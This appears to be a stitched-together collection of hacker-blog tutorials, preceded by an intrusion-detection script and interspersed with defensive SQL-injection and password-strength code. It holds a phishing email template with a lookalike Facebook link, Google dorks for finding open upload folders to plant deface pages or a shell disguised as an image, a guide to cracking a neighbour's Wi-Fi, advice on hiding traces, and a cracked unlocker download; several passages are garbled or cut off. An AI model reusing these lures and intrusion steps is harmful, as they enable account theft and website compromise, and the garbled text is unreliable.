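    Packet("192.168.1.1", "239.255.255.250", 1900, b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n\r\n"),
    Packet("198.51.100.4", "192.0.2.10", 80, b"GET /index.html HTTP/1.0\r\n\r\n"),
]

# Tuning: the home router at 192.168.1.1 is known to broadcast UPnP, so that
# (rule, source) pair is suppressed rather than disabling rule 1002 everywhere.
SUPPRESS = frozenset({(1002, "192.168.1.1")})


def normalise(payload: bytes) -> bytes:
    """Decode %xx escapes and fold case so one signature covers equivalent spellings."""
    return unquote_to_bytes(payload).lower()


def inspect(packets, rules, suppress=frozenset()):
    """Return one alert line per (packet, rule) match that is not suppressed."""
    alerts = []
    for pkt in packets:
        data = normalise(pkt.payload)
        for rule in rules:
            if rule.dport is not None and rule.dport != pkt.dport:
                continue
            if rule.content not in data:
                continue
            if (rule.sid, pkt.src) in suppress:
                continue
            alerts.append(f"[sid:{rule.sid}] {rule.msg}: {pkt.src} -> {pkt.dst}:{pkt.dport}")
    return alerts


if __name__ == "__main__":
    print("default rules:")
    for line in inspect(SAMPLE, RULES):
        print(" ", line)
    print("after tuning:")
    for line in inspect(SAMPLE, RULES, SUPPRESS):
        print(" ", line)
```

Suppressing one known-noisy source keeps the UPnP rule active for every other host, which is usually preferable to disabling the rule outright.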

Zed Attack Proxy (ZAP) – Integrated Penetration Testing Tool

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Features:

* Intercepting Proxy
* Automated scanner
* Passive scanner
* Brute Force scanner
* Spider
* Fuzzer
* Port scanner
* Dynamic SSL certificates
* API
* Beanshell integration

Characteristics:

* Easy to install (just requires Java 1.6)
* Ease of use a priority
* Comprehensive help pages
* Fully internationalized
* Under active development
* Open source
* Free (no paid for 'Pro' version)
* Cross platform
* Involvement actively encouraged

Download: ZAP 1.3.1 || zap-api-v2-4.jar from google

6 WAYS TO HACK AND DEFACE A WEBSITE ONLINE

Hello friends, today I will explain all the methods that are being used to hack a website or a website's database. This is the first part of the hacking websites tutorial, where I will explain in brief all the methods for hacking or defacing websites. Today I will give you the overview, and in later tutorials we will discuss them one by one with practical examples. So guys, get ready for the first part of the Hacking Websites class.

Don't worry, I will also tell you how to protect your websites from these attacks, along with other methods like hardening of SQL, hardening of web servers and key knowledge about CHMOD rights, that is, which thing should be given which rights.

Note: This post is for Educational Purpose only.

What are the basic things you should know before website hacking?

First of all, everything is optional, as I will start from scratch. But you need at least basic knowledge of the following things:

1. Basics of HTML, SQL, PHP.
2. Basic knowledge of JavaScript.
3. Basic knowledge of how servers work.
4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.

The first two things you can learn from a very famous website for the basics of website design, with the basics of HTML, SQL, PHP and JavaScript: http://www.w3schools.com/

As for the fourth point, that you should be an expert in removing traces, I will explain this in my future articles. So keep reading, or simply subscribe to my posts. As we know, traces are very important. Please don't ignore them, otherwise you can be in big trouble for simply doing nothing. So please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION

First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in which an attacker "injects" SQL code through a web form or manipulates URLs based on SQL parameters. It exploits web applications that use client supplied SQL queries.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

2. CROSS SITE SCRIPTING

Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them, including the FBI, CNN, eBay, Apple, Microsoft, and AOL. Some website features commonly vulnerable to XSS attacks are:

• Search Engines
• Login Forms
• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass
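The two SQL injection forms described above (input concatenated directly into a query, and a stored string concatenated later) are shown here next to the parameterised fix. This is an added example, not code from the original post; the table layout, function names and the sample input are constructed for illustration and run against an in-memory SQLite database.

```python
import sqlite3

# Constructed input of the kind a concatenated query cannot handle safely.
HOSTILE = "x' OR '1'='1"


def make_db():
    """Build a throwaway in-memory database with two constructed users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    db.execute("CREATE TABLE prefs (owner TEXT, favourite TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "a-secret"), ("bob", "b-secret")])
    return db


def lookup_concatenated(db, name):
    # Vulnerable on purpose: the input becomes part of the SQL text itself.
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return db.execute(query).fetchall()


def lookup_parameterised(db, name):
    # Fixed: the input is bound as data and never parsed as SQL.
    return db.execute("SELECT name, secret FROM users WHERE name = ?",
                      (name,)).fetchall()


def save_favourite(db, owner, favourite):
    # Storing with a bound parameter is safe at this step, whatever the value.
    db.execute("INSERT INTO prefs VALUES (?, ?)", (owner, favourite))


def _stored_favourite(db, owner):
    row = db.execute("SELECT favourite FROM prefs WHERE owner = ?",
                     (owner,)).fetchone()
    return row[0] if row else ""


def favourite_concatenated(db, owner):
    # Vulnerable on purpose: a value read back from the table is trusted and
    # concatenated into a new dynamic query (the "less direct" form).
    fav = _stored_favourite(db, owner)
    return db.execute(
        "SELECT name, secret FROM users WHERE name = '" + fav + "'").fetchall()


def favourite_parameterised(db, owner):
    # Fixed: stored values are bound exactly like fresh user input.
    fav = _stored_favourite(db, owner)
    return db.execute("SELECT name, secret FROM users WHERE name = ?",
                      (fav,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_concatenated(db, HOSTILE))    # every row
    print("parameterised:", lookup_parameterised(db, HOSTILE))   # no rows
    save_favourite(db, "bob", HOSTILE)
    print("stored, concatenated :", favourite_concatenated(db, "bob"))
    print("stored, parameterised:", favourite_parameterised(db, "bob"))
```

The second pair shows why data already in the database still needs to be bound as a parameter when it is reused in a query.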

PASSWORD CRACKING

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

N0TE: THE FOLLOWING INF0 ARE WRITTEN AND C0MP0SED, EXPLAIN BY ME, IF U HAVE ANY PROBLEM OR ANY FURTHER INF0 OR QUESTI0N DROP IT HERE #THANKS.

Most passwords can be cracked by using the following techniques:

1) Hashing: Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password. If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords. One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing: Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the words "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (e.g., the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters

and so on.

In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was. A password containing both uppercase and lowercase characters, numbers and special characters too is a strong password and can never be guessed.

3) Default Passwords: A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during the development stages of the software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter a default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet. Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force: If all other techniques fail, then attackers use the brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as the correct password is reached, it is displayed on the screen. This technique takes an extremely long time to complete, but the password will surely be cracked. The longer the password, the longer it takes to brute force it.

5) Phishing: This is the most effective and easily executable password cracking technique, which is generally used to crack the passwords of e-mail accounts and all those accounts where secret information or sensitive personal information is stored by the user, such as social networking websites, matrimonial websites, etc. Phishing is a technique in which the attacker creates a fake login screen and sends it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as the victim clicks on the "enter" or "login" button, this information reaches the attacker using scripts or online form processors while the user (victim) is redirected to the home page of the e-mail service provider. Never reply to messages which demand your username and password while claiming to be from your e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of self-service password reset) and compromising host security. However, cracking usually designates a guessing attack.

#MY GUY AFTER READING THIS, I GUESS U GO KNOW HW TO SECURE YA SELF AND PASSW0RD.
#IF U FIND DIZ INF0 CREATIVE AND IMP0RTANT, AND U DIDNT C0MMENT, GOD IS WATCHING U 000....
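The list of insecure choices under "Guessing" can be turned into a check that runs when a user sets a password. This is an added example, not part of the original post; the function names, the tiny stand-in dictionary and the digit keyboard row are assumptions made for illustration, and a real deployment would load a full wordlist.

```python
COMMON = ("password", "passcode", "admin")
# Letter rows from the post's list, plus the digit row (added for this example).
KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890")
# Constructed stand-in for a real dictionary file.
DICTIONARY = {"dragon", "monkey", "sunshine", "football"}


def variants(password):
    """Undo the 'simple modifications' from the list: case changes,
    a suffixed digit or digits, and reversed letter order."""
    base = password.lower()
    forms = {base, base.rstrip("0123456789")}
    forms |= {form[::-1] for form in forms}
    forms.discard("")
    return forms


def weak_reasons(password, username="", personal=()):
    """Return the categories from the insecure-choices list that the password
    falls into. An empty list only means none of these checks fired."""
    if not password:
        return ["blank"]
    forms = variants(password)
    user = username.lower()
    facts = {item.lower() for item in personal if item}  # names, birthplace, pet...

    def hit(predicate):
        return any(predicate(form) for form in forms)

    reasons = []
    if hit(lambda f: any(word in f for word in COMMON)):
        reasons.append("common word or derivative")
    if user and hit(lambda f: f == user):
        reasons.append("user or login name")
    if hit(lambda f: f in facts):
        reasons.append("personal information")
    if hit(lambda f: f in DICTIONARY):
        reasons.append("dictionary word")
    if hit(lambda f: len(f) >= 4 and any(f in row for row in KEYBOARD_ROWS)):
        reasons.append("keyboard row")
    return reasons


if __name__ == "__main__":
    # Constructed candidates: (password, login name, known personal facts).
    samples = [
        ("", "", ()),
        ("Admin123", "", ()),
        ("ecila1", "alice", ()),
        ("monkey7", "", ()),
        ("asdf", "", ()),
        ("Rex2009", "", ("Rex", "Lagos")),
        ("T7#vq!Lm2z", "alice", ("Rex", "Lagos")),
    ]
    for password, user, facts in samples:
        print(repr(password), "->", weak_reasons(password, user, facts) or "no match")
```

Stripping trailing digits before the lookup is what catches the "word plus a final digit" pattern reported in the MySpace survey.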

HOW To USE JOOMSCAN TO FIND JOOM VULN IN BACKtrack5 linux

Joomscan is one of the penetration testing tools that help to find vulnerabilities in the Joomla CMS. The updated version can detect 550 vulnerabilities. Let me show how to use Joomscan in BackTrack 5.

Download the Joomscan from HERE!!!

Step 1: Moving to PenTest folder
Copy/move the downloaded files into the directory /pentest/web/scanners/joomscan/

Step 2: Set Permission
Now, you have to set permission for the Joomscan file. In order to do this, type the following command in Terminal (if you don't know how to open a terminal at all, please stop reading this and start from the basics of Linux).

    chmod 0777 joomscan.pl

Step 3: Update the scanner to the latest version
To do this, enter the following command in Terminal:

    ./joomscan.pl update

Step 4: Scanning for Vulnerability
Now that everything is ok, we have to scan our Joomla site for vulnerabilities. To do this, enter the following command in Terminal:

    ./joomscan.pl -u www.YourJoomlasite.com

Wait for a while, and it will list the vulnerabilities found.

This tutorial is completely for Educational purpose only.

HOW TO CRACK WI-FI PASSWORDS USING AN ANDROID PHONE

How to Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!

Want to take advantage of your neighbor's super fast Wi-Fi connection? If they're smart, they probably have it password protected (otherwise you wouldn't be reading this, would you?). But if you have an Android phone, you can get back at them for always parking in your spot and slamming the door when they get home at 2 a.m.—by stealing...er, borrowing, their connection.

A group of researchers came up with a hack to get around hardware limitations and add monitor mode to Android devices to allow them to crack Wi-Fi passwords. Monitor mode lets you see all the traffic going through a network and how many devices are connected to it, but it can also be used for more nefarious purposes. If you're patient enough, you can crack the WEP key on a network by capturing data packets in monitor mode.

To add monitor mode to an Android device, the researchers reverse engineered the Broadcom radio chip. They modified the firmware on the chipsets in the Nexus One and Galaxy S II, which are the same ones used in the majority of mobile devices. The code is posted on Google Code, but you'll need to know which chipset you have and download the right one for your phone.

Once you've downloaded the code, it's as simple as extracting the .zip file, then running the setup and configuration files. They've included instructions for each chipset and a few different devices, so head over there to find the specifics for yours. After it's up and running, check out one of our tutorials to learn how to use it to crack the key.

So, next time your neighbor wants to borrow your power drill, rest assured that you're "borrowing" something much more valuable from them! Enjoy!!

AN EASY WAY TO FOOl SOMEONE TO yOUR PHISING LINK

Then create a nice email like this:server@gmail or wateva den send "Your account has compromised the user policy on facebook or yahoo or gmail and it will be blocked and deleted in 24hours if you fail to recover your account through our verification page here >> http:// faecboook.wapka.mobi" NOTE: This is for educational purpose and I am not responsible for anything you do with this tutorial You can shortened your site address or you can hide it with an html like this http://yahoo or gmail/verify.php Note: Remove the space in btw "<" and "a" and the space btw < / a > Probably your friend or victim will click on the link and once he/she login through that your clone site. The person email and password will be save

EAsY WAYS TO HACK A WAPKA OR MUF.MOBI SITE

Note that this tutorial is for educational use only & must not be used anyhow....... Itzz vewi easy to hack a friend muf.mobi or mobile.web.tr site.....just follow the following steps.......1.Register with the username which u want to use in d site ..... 2..Use diss as ur password $$$$$$ 3.after that,u login.... 4.then send the person which u wanna hack a friend request...... 5,immediately the person grant ur request,block the user.... 6.Register immediately with that persons username & use the previous code as ur password.......Thatz all...uve hacked the siteowner easily...... Now i wanna tech u guys wat javascript,wml & keylog are & 0u they re used in hacking a website down......??...........T he first 2 are computer language the last is a file..:for u to hack a wapka site...u must be known to them......Note:if u dont understand the 1st tutorial then u can never understand this cozz datz itz basis Script writers & breakerzz needz to b more alert.....cozz a simple mistake while flexing yah script on yah keylog...1st download keylogger into yah system....now xtract d file & unzipp it.....move to a brand new folder...open it..scroll down to wml server...left click now just scroll down to insert script.....Note:im teaching u guys dizz tutorial on based on educational reasons & not 4 u to misuse it cozz not my concern.....back to my tutorial when u get down to insert script,right click on it twice,then it openz a page...insert this script there my show.....the place i wrote my show,u can write anyfin just make sure u know wat uve written offhead....then scroll down & mark javanot removal...then create an acct @ wapka.mobi.....or muf.mobi or facebook or yahoo or gmail or watsoever the site u wanna hack is under....e.g if the site u wanna hack is a wapka site,create a new wapka site,if itzz muf.mobi create a new muf.mobi site if itz a yahoo acct u wanna hack,create a yahoo acct,if itz fazbuk,create fazebuk & the rest just creat an acct in which the site u wanna hack is 
under..make sure ur pw for d site which u created has password $$$$ $$ now use that same pw & username to register in the site u wanna hack...then just go to the site owners profile,vote him bad....then open yah keylogger,immediately,it openzz differnt files,locate the 1 u used 4 ur javascript...ie the 1 u used in place of myshow.....1st u have to delete the forum of the site u wanna hack...just open any forum topic & using fake login page which uve must have already registered 4 @ jotform.com...

HOW TO HACK A SITE USING KM.SQl

how to hack a web site with km.sql this is the step 1 goto to any site u woint to hack and and try this [ http://the site.com/forum/post.php] it we show white dat mens u can hack d site all u need to do is to goto d forum creat a topic and put d this code in the name of the topic the first box put this code ==> --------------------------------- And then in the 2nd box put this

HOW TO REVEAL THE PASSWORD BEHIND ASTERISK(**********)

Do you want to reveal the passwords hidden behind asterisks (****)? Follow the steps given below:

1) Open the login page of any website (e.g. http://mail.yahoo.com).
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

    javascript:alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', a window pops up showing the password typed by you.

Note: This trick may not work with Firefox.

HOW TO ROOT YOUR JAVA fONE AND START MINIMIsING

This is one of the most wanted tutorials, especially for Java users who have been trying and thinking of ways they can make their Java phone minimize, so today I will be sharing with you a trick I used to make my Java phone start minimizing like Symbian and Android smartphones.

Requirement needed: Phoenix Service Suite, which you can Google search for and download onto your laptop or desktop.

Steps On How To Root Your Java Phone

Step 1: Dial *#0000# on your phone.
Step 2: After dialing it you will see something like RM_614 or any number.
Step 3: Google search for Rm_614 or anything you see, but make sure when searching for it to include .ppu, for example Rm_614.ppu, then download it to your laptop.
Step 4: After you have downloaded it, connect your phone to your laptop using a USB cable.
Step 5: After you have connected your phone to your laptop, make sure you choose Ovi Suite mode.
Step 6: Open Phoenix Service Suite, run it on your laptop and click on scan product.
Step 7: After you have clicked scan, look by the side and select product profile.
Step 8: After you have clicked it, locate your Rm_614.ppu, depending on what you downloaded, and select it. You will see a list appear; just tick them all, and wherever you see 0 change it to 1.
Step 9: After you are done with that, click on enable tck and flash. Your phone will restart and pop up a warning message saying "WARNING TCK FLAG SET". Don't panic; after that pop-up, restart your phone and you are done.

Can you see, it is something simple and very easy to do, so I would like to hear your views about it via comment. Also visit Ojcyber to see daily updates.

Note: when downloading the 'phoenix service suite' make sure you disable your antivirus, because the app does not contain a virus.

How to Unlock Huawei E303 Modems Using DC Unlocker for Free

Although DC Unlocker is free to download, you will need to buy credits before you can use it to unlock most new modems. But in this post today, I will be showing you how to use this software without paying a dime.

1. http://is.gd/gidiunlockto download full cracked version or CLICK HERE to download DC Unlocker from MF.
2. Extract the content of the .zip file.
3. Once you've extracted all the required files, run "dccrap.exe".
4. Disconnect your internet connection and plug in your USB modem with a different operator SIM (for Huawei users, you don't need to swap any SIM). Then insert your modem into the USB port.
5. Choose the "manufacturer" of your modem (Huawei Datacards or ZTE Datacards; choose whichever matches your modem).
6. Click the magnifying glass, and it will search for plugged-in USB modems.
7. Once the modem is detected, click 'Server Menu' (login page) and type whatever you want. It's just a lame login system.
8. Click Unlocking Menu, then choose "Unlock".
9. Wait till the unlocker program says that "unlock is successfully done".
10. Now, enjoy your unlocked modem.

That's it! Now, you have a universal modem that can work on any Nigerian GSM SIM card.

NOTE: This may not work for some E303 modems. Also, you don't need to buy any voucher or credit from DC Unlocker. This software has been nulled/cracked, so it can unlock all sorts of modems and phones without buying credits. I hope it works for you; let's hear your feedback. If you have any question, please drop your comment below.

how to use any sim on moderm without unlockin it

Even up till now, some members have not been able to use any SIM on their internet modem {unlock}. We have decided to publish this tutorial in order to enable them to use different SIM cards in their modem without unlocking. It's very simple, but you will need to have Nokia PC Suite installed on your PC before this tutorial can be useful for you. Let's get started!

HOW TO USE ANOTHER SIM IN YOUR MODEM WITHOUT UNLOCKING

1. Download Nokia PC Suite to your PC HERE or Google search for it online.
2. Insert any SIM into your modem {even if it is not unlocked} and plug it into your PC.
3. Your modem will display an Invalid SIM warning; just ignore it and close the modem software.
4. Start Nokia PC Suite.
5. Click on File > Connect to the Internet, then click on the spanner-like icon to configure it.
6. Select your modem from the list, and input the operator APN setting as you would when using a Nokia mobile connection. E.g.: Airtel = internet.ng.zain.com || MTN = web.gprs.mtnnigeria.net || Glo = glogwap || Etisalat = etisalat
7. Finish setup.
8. Now connect to the internet through PC Suite.
9. Wow!!! You are connected to the internet using your PC Suite + modem without unlocking the modem.

NOTE: You can insert another SIM card and follow the above steps, then put in the APN of the network provider and you are good to go.

Click on the Like Button if You Appreciate this Tutorial...

Thursday 22 May 2014

SIMPLE GOOGLE DORKS TO TAKE DOWN SITES VULN

open www.google.com enter The Dork inurl:"spaw2/dialogs/" or inurl:"spaw2/uploads/files/" You will Got results Like this " Index of/ spaw2/dialogs/" or : site.com/abc/spaw2/uploads/files /abc/abc.pdf Now replace TheSpaw2/Uploads/abc/abcur with this url for example i got this website so Now i will replcae with Now the URL is Now you will Got a window like this (click to see) if you want to Upload deface page then Select files option ... and i f you want to upload shell then select image option and upload your shell as shell.php;,jpg see You uploaded deface here www.site.com/profile/spaw2/uploads/


HACK THOUSANDS OF MYSQL DATABASES USING THIS DORK

allinurl:index.php?db=information_schema
